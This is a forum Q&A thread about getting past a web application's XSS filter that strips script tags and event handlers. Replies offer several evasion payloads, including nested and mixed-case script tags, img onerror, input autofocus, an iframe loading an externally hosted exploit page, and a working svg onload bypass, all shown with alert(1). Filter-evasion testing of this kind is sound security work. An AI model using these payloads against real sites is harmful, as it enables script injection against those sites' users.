# xss bypass for javascript elements filtered as [removed]

Tags: xss, javascript

If we write test `">script>alert(1)/script>`, application is filtering the JavaScript with `test">[removed]alert(1)[removed]`.

And payloads like `onmouseover`,`onmouseout` are skipping.

In this case what kind of JavaScript bypass can be used for performing XSS.

Comment: Try <img src="x" onerror="alert(1)">  or <input onfocus="alert(1)" autofocus>

Comment: all event handlers are blacklisted. I tried writing case insensitive also but that is also skipping. Any other event handler?

Comment: Have you seen the [cheat sheet](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)?

Answer (score 1, accepted):

I think you can try with the following options:

```
<scr<script>ipt>alert(1)</scr</script>ipt>
<ScRiPt>alert(1)</ScRiPt>
```

Also you can use another HTML tags:

```
<img src="javascript:alert(1)">
<h1 onclick="alert(1)">Click me</h1>
```

I recommend you the following link, you could find useful samples.

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

I hope this information helps you.

Good luck.

Comment: Application is skipping onclick. This is coming like this <h1 >Click me</h1>. h1 tag is working fine.

Comment: 1. The first 2 payloads are not working, application is changing it to this : <scr[removed]ipt>alert(1)</scr[removed]ipt> 2. Application is skipping onclick and all these kind of event handlers. The payload is coming like this <h1 >Click me</h1>. h1 tag is working fine no encoding, but application is skippling javascript event handlers.

Comment: Then you can try to add an iframe, something like this: '<iframe src="http://domain/exploit.html"></iframe>'. You can do a HTML page with your exploit. Another option is an image tag, something like this: '<img src="http://domain/myscript.js" />. The image tag just get the resource, it doesn't validate if the resource is a valid image.

Answer (score 1):

A bit late, but today I came across a website that filters in the exact same way. I managed to bypass it like this:

```
<svg/onload=alert(1);
```